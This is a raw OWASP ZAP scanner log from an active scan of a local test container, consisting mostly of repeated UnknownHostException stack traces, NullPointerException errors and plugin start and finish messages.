org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081303 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081305 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081307 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081310 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081312 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.sendUserAgent(TestUserAgent.java:156) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.attack(TestUserAgent.java:145) at org.zaproxy.zap.extension.ascanrulesAlpha.TestUserAgent.scan(TestUserAgent.java:114) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 13081496 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081496 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081697 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081697 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081898 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13081898 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13084308 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13084506 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13086528 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13088752 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13091809 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13092177 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | TestUserAgent in 199.981s 13092177 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | ProxyDisclosureScanner strength LOW threshold MEDIUM 13228054 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13234033 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13265374 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 13265374 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 13265379 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 13266358 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 13266360 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 13293195 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | ProxyDisclosureScanner in 201.018s 13293196 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | HttpsAsHttpScanner strength LOW threshold MEDIUM 13295120 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin http://172.17.0.2:8080 | HttpsAsHttpScanner in 1.925s 13295120 [Thread-66] INFO org.parosproxy.paros.core.scanner.HostProcess - start host http://172.17.0.2:8080 | SlackerCookieDetector strength LOW threshold MEDIUM 13295125 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13295327 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13295731 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13295731 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13295932 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13295932 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296132 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296132 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296334 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296334 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296536 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296536 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296737 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296737 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13296936 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297138 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297338 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297340 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297538 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297541 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297740 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297740 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297944 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13297944 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298143 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298143 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298342 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298343 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298545 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298548 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298746 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298746 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298952 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13298953 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299152 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299153 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299356 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299356 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299554 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299556 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299755 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299755 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299960 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13299960 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300160 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300162 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300361 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300361 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300561 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300562 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300760 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300760 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300962 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13300962 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301165 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301165 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301363 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301365 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301566 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301567 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301766 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301766 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301967 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13301968 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302168 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302169 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302367 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302367 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302570 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302572 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302771 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13302771 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13303693 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13303693 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13303896 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13303898 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304097 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304097 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304299 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304305 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304520 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304700 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304700 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304900 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13304900 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305100 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305101 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305301 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305304 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305501 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305504 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305703 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305703 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305904 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13305906 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13306613 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13306613 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13306706 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13306707 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13306906 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13306908 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307106 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307111 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307311 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307313 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307512 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307513 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307712 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307714 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307914 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13307915 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308120 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308120 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308321 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 13308322 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - 